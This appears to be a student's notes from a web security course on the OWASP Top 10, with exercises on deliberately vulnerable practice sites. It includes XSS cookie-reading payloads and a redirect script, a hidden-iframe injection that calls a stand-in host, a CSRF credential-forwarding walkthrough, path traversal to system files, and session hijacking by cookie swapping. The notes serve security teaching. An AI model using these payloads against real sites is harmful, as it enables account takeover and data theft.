Top 10 Vulnerabilities, Day 4

#4: Insecure Direct Object Reference

Google search: filetype:xls 通訊錄

 

#3: Cross-Site Scriptiong (XSS)

<script>alert(‘hello’)</script>

& –> &amp;

< –> &lt;

> –> &gt;

 

Exercise

1. Visit the site, http://hackyourselffirst.troyhunt.com

2. Register one account

3. Vote for selected Car (User A)

4. Comment with: <script>alert(document.cookie);</script>

5. Visit that voted Car comment (User B)

 

1. FireBug

2. Tamper Data

3. Wappalyzer

 

Using Tamper Data to change comment text and POST to website:

1. Click on Vote button, a comment window will pop-up

2. Open Tamper Data application

3. Type something on comment window

4. Click Start Tamper button on Temper Data application

5. Click Vote button on comment window

6. Tamper Data will pop up a window, click Tamper button

7. Try to change comments and then click Submit

 

Download and install Fiddler:

Download version, Fiddler2

Find Fiddler listens on port, Tools –> Connections –> Fiddler listens on port

Config on broswer, FireFox, for example:

 

Exercise: try to post from Fiddler

0. Open Fiddler and vote normally on the website, so Fiddler catches all traffics

1. Click Composer button

2. Find vote request item

3. Drag & drop that URL into the right hand side window

4. Change Request Body text

5. Click Execute button to POST to website

6. Refresh broswer page to see the result

 

<script>location.replace(“http://xxx”)</script>

 

How do i prevent Cross-Site Scription (XSS)?

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

 

#2: Hacking Broken Authentication & Session Management

1. Prediction Session ID

2. Brute-forcing session IDs

3. Session fixation

4. Hacking Cookies

5. Cross-site request forgery

 

1. Strong Password

2. Account lockout policy

Session Life Cycle

 

#1 Source of Injection

1. User Agent

2. Cookie

3. Http Header

4. GET/Post Paramenter

5. URL Parameter

6. SQL Query

7. XPath Query

8. IFrame

 

Google search: user agent string

 

Exercise: change user agent by FireFox add-on

Change to User Agent to iPhone 3.0

Refresh web page, you will see mobile view on Yahoo!

 

Fiddler also can change User Agent

 

iFrame Injection Practices

Create one HTML file, like below:

<html>

Document.write(‘<iframe scr='”http://xxxx/” width=100 height=100 style=”visibility:hidden”></iframe>’);

</html>

Top 10 Vulnerabilities, Day 3

#9: Using Components with Known Vulnerabilities

http://plvrs.trendmicro.com

If there is number in Vulnerability column, that means there are vulnerability on that specfic 3rd Party Component.

 

Click View to see following info, CVE ID:

CVE: Common Vulnerabilities and Exposures

 

Search CVE database on Google,

Example, CVE-2014-1266, known vulnerability for Apple

 

But hacker will use Exploit Database

 

http://www.exploit-db.com/exploits/25719/

 

Blind SQL Injection

http://www.exploit-db.com/exploits/21546/

 

 

#8: Cross-Site Request Forgery (CSRF)

One-Click Attack, Session Riding

1. User has success authenticated

2. Hacker send a link to that user

3. User click on that link, but not authenticated by himself, to access the website

 

Exercise, send a link to your friend, following for example, to see if your friend can open that directly.

http://www.kingstone.com.tw/book/book_page.asp?kmcode=2013000091501&lid=book-class-newbook-first&actid=vertical

 

What can be achieved?

1. Adding movies to his rental queue

2. Adding a movie to the top of his rental queue

3. Changing the name and address on the account

4. Enabling/disabling extra movie information

5. Changing the e-mail address and password on the account

 

 

Launch WebGoat in local machine, by double click webgoat_8080

 

Open Chrome, type in URL: http://127.0.0.1:8080/WebGoat/attack

Name & Password: guest

Click Start WebGoat button to launch it

 

 

http://127.0.0.1:8080/WebGoat/attack?Screen=52&menu=900&transferFunds=5000

 

Homework: How do I prevent it?

1. Add a hidden CSRFToken in every page.

2. Generate a CAPTCHA to client, enforce user to type manually.

 

Example 2: steps like below

1. Observation HTTP Post on Victim site

2. PHP post parameters on Phishing site

3. Generate the URL and send to Users

4. Wait for the User to click

 

Step 1: Observation HTTP Post on Victim site

https://www.directpass.com/signin

Request URL

Request Payload

 

Response Message

 

Step 2: PHP post parameters on Phishing site

http://whiteacid.org/misc/xss_post_forwarder.php?xss_target=

 

Step 3: Generate the URL and send to Users

http://whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.directpass.com/api/auth/checkaccount&account=abc@gmail.com&password=1234abcde

 

Step 4: Wait for the User to click

 

#7: Missing Function Level Access Control

Example, mobile to view picture do not need authentication

 

Exercise, login WebGoat, try if can view the Admin Functions

Hint: add parameter in URL to do GET request

 

#6: Sensitive Data Exposure

Identify the web technology of the following sites?

 

http://Hackyourselffirst.troyhunt.com

http://crackme.cenzic.com

http://demo.testfire.net

 

Homework: How to prevent it?

1. Using SSL, https

2.

 

#5: Security Mis-configuration

There are 4 major areas

Setting

Admin Page

User Account

Demo Application

 

How to prevent it? When Deployment

1. Environment Hardening (patch)

2. Vulnerability Management

3. Operational Enablement

 

Google: index of /admin

 

Homework: how if I want to search by Google, but don’t want to show too much?

1. Use Nofollow meta tag to tell search engine not to spider

2. Use Noindex meta tag to tell search engine not to index this page

3. Use X-Roobot

 

Reference:

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

Day 2

GET

http://demo.testfire.net

by passing URL parameter, ?content=xxxxx

 

POST

http://hackyourselffirst.troyhunt.com/

Response Header by doing Login action

Request URL by https

 

Edit Cookie

1. Install Chrome add-on EditThisCookie

2. Change AuthCookie from myself to other people’s cookie

3. Refresh the web, then we can see system will auto login by other people’s cookie

 

Login with Remember Me

Using Base64 decoder to get the right password

 

Cookie

1. Cookie can NOT authenticate user

2. Cookie is automatically sent to the website for EVERY coming communication with the website

3. So, please make sure all site request are using https

4. Cookie Attributes

    Expires

    Domain: (No need to specify. Only sent to original site)

    Path: Only sent to this path, for example, /Account/

    HttpOnly: does it allow to by get by JavaScript

    Secure: only https will sent to cookie to website

 

alter(document.cookie) to print out local cookie

Tick HttpOnly of Email & Password, means only allow by http request, but not allowed by using JavaScript

Can’t see email & password when alter(document.cookie)

 

Hacker Tip

If we know the website is using content=file name, so we can change the path to what we want

For example, using ..\..\..\..\..\..\ to root folder, then go to the path to get the file that we need, like C:\Windows\systme.ini

 

URL Redirect Issue

http://www.hp.com/cgi-bin/leaving_hp.cgi?cc=us&lang=en&exit_text=Click%20here%20to%20take%20a%20customer%20survey_ooxx&area_text=Newsroom&area_link=http"://www.google2.com/&exit_link=http://www.google1.com/&adid=10427473&affpid=4003003

 

URL decode/encode

http://yehg.net/encoding

After encode, the string is become below

 

URL Tmper

1. http://hackyourselffirst.troyhunt.com//Search?searchTerm=');alert(document.cookie);//

2. http://hackyourselffirst.troyhunt.com//Search?searchTerm=%27);alert(document.cookie);//